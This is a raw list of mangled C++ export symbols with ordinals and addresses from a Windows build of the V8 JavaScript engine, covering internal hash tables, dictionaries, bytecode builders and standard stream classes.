                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1090x1407eb280
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1100x1407eb100
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1110x1407eb340
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1120x1407eb390
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1130x1407eb3e0
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1140x1407eb4a0
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1150x1407eb560
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1160x1407eb620
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1170x1407eb6f0
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1180x1407eb7b0
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1190x1407eb870
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1200x1407eb930
                                                                                                                                                                                                        ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1210x1407eb7b0
                                                                                                                                                                                                        ??$NewHeapNumber@$00@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1220x1409dff60
                                                                                                                                                                                                        ??$NewHeapNumber@$00@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1230x1409e0000
                                                                                                                                                                                                        ??$NewHeapNumber@$03@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1240x1409e00b0
                                                                                                                                                                                                        ??$NewHeapNumber@$0A@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1250x1409e0150
                                                                                                                                                                                                        ??$PrepareErrors@VIsolate@internal@v8@@@PendingCompilationErrorHandler@internal@v8@@QEAAXPEAVIsolate@12@PEAVAstValueFactory@12@@Z1260x1407a22c0
                                                                                                                                                                                                        ??$PrepareErrors@VLocalIsolate@internal@v8@@@PendingCompilationErrorHandler@internal@v8@@QEAAXPEAVLocalIsolate@12@PEAVAstValueFactory@12@@Z1270x1407a2300
                                                                                                                                                                                                        ??$PrintCheckOperand@C@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@C@Z1280x140e5dc80
                                                                                                                                                                                                        ??$PrintCheckOperand@D@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@D@Z1290x140e5dc80
                                                                                                                                                                                                        ??$PrintCheckOperand@E@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@E@Z1300x140e5dca0
                                                                                                                                                                                                        ??$PrintCheckOperand@H@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z1310x140e5dcc0
                                                                                                                                                                                                        ??$PrintCheckOperand@I@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I@Z1320x140e5de00
                                                                                                                                                                                                        ??$PrintCheckOperand@J@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@J@Z1330x140e5df40
                                                                                                                                                                                                        ??$PrintCheckOperand@K@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@K@Z1340x140e5df60
                                                                                                                                                                                                        ??$PrintCheckOperand@PEAC@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAC@Z1350x140e5df80
                                                                                                                                                                                                        ??$PrintCheckOperand@PEAD@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAD@Z1360x140e5df80
                                                                                                                                                                                                        ??$PrintCheckOperand@PEAE@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAE@Z1370x140e5df80
                                                                                                                                                                                                        ??$PrintCheckOperand@PEBC@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBC@Z1380x140e5df80
                                                                                                                                                                                                        ??$PrintCheckOperand@PEBD@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBD@Z1390x140e5df80
                                                                                                                                                                                                        ??$PrintCheckOperand@PEBE@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBE@Z1400x140e5df80
                                                                                                                                                                                                        ??$PrintCheckOperand@PEBX@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBX@Z1410x140e5dfa0
                                                                                                                                                                                                        ??$PrintCheckOperand@_J@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_J@Z1420x140e5e0e0
                                                                                                                                                                                                        ??$PrintCheckOperand@_K@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K@Z1430x140e5e100
                                                                                                                                                                                                        ??$ReadZigZag@H@ValueDeserializer@internal@v8@@AEAA?AV?$Maybe@H@2@XZ1440x1407b38f0
                                                                                                                                                                                                        ??$RegisterObjectWithInvalidatedSlots@$00@MemoryChunk@internal@v8@@QEAAXVHeapObject@12@@Z1450x140972e00
                                                                                                                                                                                                        ??$RegisterObjectWithInvalidatedSlots@$0A@@MemoryChunk@internal@v8@@QEAAXVHeapObject@12@@Z1460x140972ea0
                                                                                                                                                                                                        ??$Rehash@VIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VOrderedNameDictionary@internal@v8@@@12@H@Z1470x1407e1a90
                                                                                                                                                                                                        ??$Rehash@VIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@QEAAXPEAVIsolate@12@@Z1480x1407bfe30
                                                                                                                                                                                                        ??$Rehash@VIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@SA?AV?$Handle@VSwissNameDictionary@internal@v8@@@12@PEAVIsolate@12@V312@H@Z1490x1407c0280
                                                                                                                                                                                                        ??$Rehash@VLocalIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@QEAAXPEAVLocalIsolate@12@@Z1500x1407c0650
                                                                                                                                                                                                        ??$Rehash@VLocalIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@SA?AV?$Handle@VSwissNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@H@Z1510x1407c0aa0
                                                                                                                                                                                                        ??$SignedDivisionByConstant@I@base@v8@@YA?AU?$MagicNumbersForDivision@I@01@I@Z1520x1410ee000
                                                                                                                                                                                                        ??$SignedDivisionByConstant@_K@base@v8@@YA?AU?$MagicNumbersForDivision@_K@01@_K@Z1530x1410ee100
                                                                                                                                                                                                        ??$Start@$00@LookupIterator@internal@v8@@AEAAXXZ1540x14081b820
                                                                                                                                                                                                        ??$Start@$0A@@LookupIterator@internal@v8@@AEAAXXZ1550x14081b8d0
                                                                                                                                                                                                        ??$TailCallBytecodeDispatch@V?$TNode@VObject@internal@v8@@@internal@v8@@V?$TNode@UIntPtrT@internal@v8@@@23@V?$TNode@VBytecodeArray@internal@v8@@@23@V?$TNode@VExternalReference@internal@v8@@@23@@CodeAssembler@compiler@internal@v8@@QEAAXAEBVCallInterfaceDescriptor@23@V?$TNode@URawPtrT@internal@v8@@@23@V?$TNode@VObject@internal@v8@@@23@V?$TNode@UIntPtrT@internal@v8@@@23@V?$TNode@VBytecodeArray@internal@v8@@@23@V?$TNode@VExternalReference@internal@v8@@@23@@Z1560x140f1c560
                                                                                                                                                                                                        ??$ToBytecodeArray@VIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVIsolate@23@@Z1570x140918dc0
                                                                                                                                                                                                        ??$ToBytecodeArray@VIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVIsolate@23@HHV?$Handle@VByteArray@internal@v8@@@23@@Z1580x140911fb0
                                                                                                                                                                                                        ??$ToBytecodeArray@VLocalIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVLocalIsolate@23@@Z1590x140918e60
                                                                                                                                                                                                        ??$ToBytecodeArray@VLocalIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVLocalIsolate@23@HHV?$Handle@VByteArray@internal@v8@@@23@@Z1600x1409120a0
                                                                                                                                                                                                        ??$ToFixedArray@VIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVIsolate@23@@Z1610x1408f4240
                                                                                                                                                                                                        ??$ToFixedArray@VLocalIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVLocalIsolate@23@@Z1620x1408f4470
                                                                                                                                                                                                        ??$ToSourcePositionTable@VIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVIsolate@23@@Z1630x140918f00
                                                                                                                                                                                                        ??$ToSourcePositionTable@VIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVIsolate@23@@Z1640x140912190
                                                                                                                                                                                                        ??$ToSourcePositionTable@VIsolate@internal@v8@@@SourcePositionTableBuilder@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@12@PEAVIsolate@12@@Z1650x140a7ee10
                                                                                                                                                                                                        ??$ToSourcePositionTable@VLocalIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVLocalIsolate@23@@Z1660x140918f20
                                                                                                                                                                                                        ??$ToSourcePositionTable@VLocalIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVLocalIsolate@23@@Z1670x1409121d0
                                                                                                                                                                                                        ??$ToSourcePositionTable@VLocalIsolate@internal@v8@@@SourcePositionTableBuilder@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@12@PEAVLocalIsolate@12@@Z1680x140a7ee90
                                                                                                                                                                                                        ??$UnsignedDivisionByConstant@I@base@v8@@YA?AU?$MagicNumbersForDivision@I@01@II@Z1690x1410ee210
                                                                                                                                                                                                        ??$UnsignedDivisionByConstant@_K@base@v8@@YA?AU?$MagicNumbersForDivision@_K@01@_KI@Z1700x1410ee340
                                                                                                                                                                                                        ??$WriteBarrierForRange@VFullObjectSlot@internal@v8@@@Heap@internal@v8@@QEAAXVHeapObject@12@VFullObjectSlot@12@1@Z1710x1409aaac0
                                                                                                                                                                                                        ??$WriteToFlat@E@String@internal@v8@@SAXV012@PEAEHH@Z1720x1407c2cf0
                                                                                                                                                                                                        ??$WriteToFlat@E@String@internal@v8@@SAXV012@PEAEHHAEBVSharedStringAccessGuardIfNeeded@12@@Z1730x1407c2d30
                                                                                                                                                                                                        ??$WriteToFlat@G@String@internal@v8@@SAXV012@PEAGHH@Z1740x1407c3070
                                                                                                                                                                                                        ??$WriteToFlat@G@String@internal@v8@@SAXV012@PEAGHHAEBVSharedStringAccessGuardIfNeeded@12@@Z1750x1407c30b0
                                                                                                                                                                                                        ??$WriteZigZag@H@ValueSerializer@internal@v8@@AEAAXH@Z1760x1407b3a50
                                                                                                                                                                                                        ??0?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z1770x140078b40
                                                                                                                                                                                                        ??0?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ1780x1400fba60
                                                                                                                                                                                                        ??0?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z1790x140078b40
                                                                                                                                                                                                        ??0?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ1800x1400fba60
                                                                                                                                                                                                        ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$01$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@internal@v8@@QEAA@XZ1810x140078ac0
                                                                                                                                                                                                        ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$02$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$01$0A@@23@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@internal@v8@@QEAA@XZ1820x140078ac0
                                                                                                                                                                                                        ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$03$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$02$0A@@23@V?$PerThreadAssertScopeDebugOnly@$01$0A@@23@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@internal@v8@@QEAA@XZ1830x140078ac0
                                                                                                                                                                                                        ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$00@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$00@23@@internal@v8@@QEAA@XZ1840x140078ac0
                                                                                                                                                                                                        ??0?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@internal@v8@@QEAA@XZ1850x140078ac0
                                                                                                                                                                                                        ??0?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAA@PEAVIsolate@12@V?$Vector@$$CBE@base@2@I_N2@Z1860x1406d5c20
                                                                                                                                                                                                        ??0?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAA@PEAVLocalIsolate@12@V?$Vector@$$CBE@base@2@I_N2@Z1870x1406d5e30
                                                                                                                                                                                                        ??0?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z1880x140078b40
                                                                                                                                                                                                        ??0?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ1890x1400fba60
                                                                                                                                                                                                        ??0?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z1900x140078b40
                                                                                                                                                                                                        ??0?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ1910x1400fba60
                                                                                                                                                                                                        ??0?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z1920x140078b40
                                                                                                                                                                                                        ??0?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA@XZ1930x1400fba60
                                                                                                                                                                                                        ??0?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z1940x140078b40
                                                                                                                                                                                                        ??0?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA@XZ1950x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@IEAA@_K@Z1960x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAA@XZ1970x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z1980x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ1990x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z2000x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ2010x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z2020x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ2030x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z2040x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA@XZ2050x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@IEAA@_K@Z2060x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAA@XZ2070x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z2080x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ2090x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z2100x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA@XZ2110x1400fba60
                                                                                                                                                                                                        ??0?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@IEAA@_K@Z2120x140078b40
                                                                                                                                                                                                        ??0?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAA@XZ2130x1400fba60
                                                                                                                                                                                                        ??0?$MagicNumbersForDivision@I@base@v8@@QEAA@II_N@Z2140x1410ee4a0
                                                                                                                                                                                                        ??0?$MagicNumbersForDivision@_K@base@v8@@QEAA@_KI_N@Z2150x1410ee4b0
                                                                                                                                                                                                        ??0?$MemorySpan@$$CBD@v8@@QEAA@PEBD_K@Z2160x140450cf0
                                                                                                                                                                                                        ??0?$MemorySpan@$$CBD@v8@@QEAA@XZ2170x140079750
                                                                                                                                                                                                        ??0?$MemorySpan@$$CBE@v8@@QEAA@PEBE_K@Z2180x140450cf0
                                                                                                                                                                                                        ??0?$MemorySpan@$$CBE@v8@@QEAA@XZ2190x140079750
                                                                                                                                                                                                        ??0?$MemorySpan@$$CBVCFunction@v8@@@v8@@QEAA@PEBVCFunction@1@_K@Z2200x140450cf0
                                                                                                                                                                                                        ??0?$MemorySpan@$$CBVCFunction@v8@@@v8@@QEAA@XZ2210x140079750
                                                                                                                                                                                                        ??0?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z2220x140078b40
                                                                                                                                                                                                        ??0?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ2230x1400fba60
                                                                                                                                                                                                        ??0?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z2240x140078b40
                                                                                                                                                                                                        ??0?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ2250x1400fba60
                                                                                                                                                                                                        ??0?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAA@_K@Z2260x140078b40
                                                                                                                                                                                                        ??0?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAA@XZ2270x1400fba60
                                                                                                                                                                                                        ??0?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAA@_K@Z2280x140078b40
                                                                                                                                                                                                        ??0?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAA@XZ2290x1400fba60
                                                                                                                                                                                                        ??0?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@IEAA@_K@Z2300x140078b40
                                                                                                                                                                                                        ??0?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAA@XZ2310x1400fba60
                                                                                                                                                                                                        ??0?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAA@PEAVZone@12@PEAVScanner@12@_KPEAVAstValueFactory@12@PEAVPendingCompilationErrorHandler@12@PEAVRuntimeCallStats@12@PEAVLogger@12@VUnoptimizedCompileFlags@12@_N@Z2320x140772280
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$00$00@internal@v8@@QEAA@XZ2330x140a7d4f0
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$00$0A@@internal@v8@@QEAA@XZ2340x140a7d520
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$01$00@internal@v8@@QEAA@XZ2350x140a7d550
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$01$0A@@internal@v8@@QEAA@XZ2360x140a7d580
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$02$00@internal@v8@@QEAA@XZ2370x140a7d5b0
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$02$0A@@internal@v8@@QEAA@XZ2380x140a7d5e0
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$03$00@internal@v8@@QEAA@XZ2390x140a7d610
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$03$0A@@internal@v8@@QEAA@XZ2400x140a7d640
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$04$00@internal@v8@@QEAA@XZ2410x140a7d670
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$04$0A@@internal@v8@@QEAA@XZ2420x140a7d6a0
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$05$0A@@internal@v8@@QEAA@XZ2430x140a7d6d0
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$0A@$00@internal@v8@@QEAA@XZ2440x140a7d700
                                                                                                                                                                                                        ??0?$PerThreadAssertScope@$0A@$0A@@internal@v8@@QEAA@XZ2450x140a7d730
                                                                                                                                                                                                        ??0?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2460x1404b9be0
                                                                                                                                                                                                        ??0?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2470x1404b9be0
                                                                                                                                                                                                        ??0?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2480x1404b9be0
                                                                                                                                                                                                        ??0?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2490x1404b9be0
                                                                                                                                                                                                        ??0?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2500x1404b9be0
                                                                                                                                                                                                        ??0?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z2510x1404b9be0
                                                                                                                                                                                                        ??0?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2520x140078b40
                                                                                                                                                                                                        ??0?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2530x140078b40
                                                                                                                                                                                                        ??0?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2540x140078b40
                                                                                                                                                                                                        ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@AEBV012@@Z2550x1404b9c20
                                                                                                                                                                                                        ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@PEAVZone@12@@Z2560x1404b9c40
                                                                                                                                                                                                        ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@std@@PEAVZone@12@@Z2570x1404b9c60
                                                                                                                                                                                                        ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@_KPEAVMoveOperands@compiler@12@PEAVZone@12@@Z2580x1404b9cf0
                                                                                                                                                                                                        ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@_KPEAVZone@12@@Z2590x1404b9d60
                                                                                                                                                                                                        ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ2600x14047b990
                                                                                                                                                                                                        ??0?$basic_ios@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z2610x14047b9b0
                                                                                                                                                                                                        ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@IEAA@$$QEAV01@@Z2620x14047b9f0
                                                                                                                                                                                                        ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z2630x1400f8660
                                                                                                                                                                                                        ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@W4_Uninitialized@1@_N@Z2640x14047baa0
                                                                                                                                                                                                        ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@AEBV01@@Z2650x14047bb20
                                                                                                                                                                                                        ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@W4_Uninitialized@1@@Z2660x14047bc30
                                                                                                                                                                                                        ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ2670x1400ef780
                                                                                                                                                                                                        ??0?$enable_shared_from_this@VCounters@V8Inspector@v8_inspector@@@std@@IEAA@AEBV01@@Z2680x140079750
